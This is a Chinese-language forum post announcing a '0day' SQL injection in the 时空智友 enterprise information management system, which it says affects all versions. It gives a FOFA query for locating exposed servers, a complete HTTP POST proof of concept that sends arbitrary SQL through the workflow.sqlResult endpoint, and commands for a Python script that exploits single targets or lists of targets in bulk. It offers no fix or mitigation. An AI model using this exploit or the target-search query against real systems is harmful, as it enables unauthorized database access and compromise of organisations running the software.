|
【0day】时空智友企业信息管理系统 SQL注入漏洞
一、漏洞描述
时空智友企业信息管理系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。系统存在SQL注入漏洞,攻击者通过恶意构造的SQL查询来执行未经授权的数据库操作。当应用程序未能正确验证、转义或过滤用户提供的输入数据时,攻击者可以利用这个漏洞来执行恶意的SQL语句,从而获取系统数据以及获得系统控制权限。
二、影响范围
时空智友企业信息管理系统所有版本
三、fofa查询
body="时空智友企业信息管理"
四、POC
- POST /formservice?service=workflow.sqlResult HTTP/1.1
- Host: ip:port
- User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
- Accept-Encoding: gzip, deflate
- Cookie: JSESSIONID=48F4377921FEFB1A3A3365AF6D0B5D5D; __qypid=
- DNT: 1
- Connection: close
- Upgrade-Insecure-Requests: 1
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 60
复制代码
- {"params": {"a": "11"}, "sql": "select db_name()"}
复制代码
五、批量检测利用
单个检测利用
- python .\SHIKONGZHIYOU_poc.py -u http://ip:port
复制代码
SQL Server 语法参考:
- https://blog.csdn.net/qq_36119192/article/details/88679754
复制代码
批量检测
- python .\SHIKONGZHIYOU_poc.py -f filename
复制代码
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|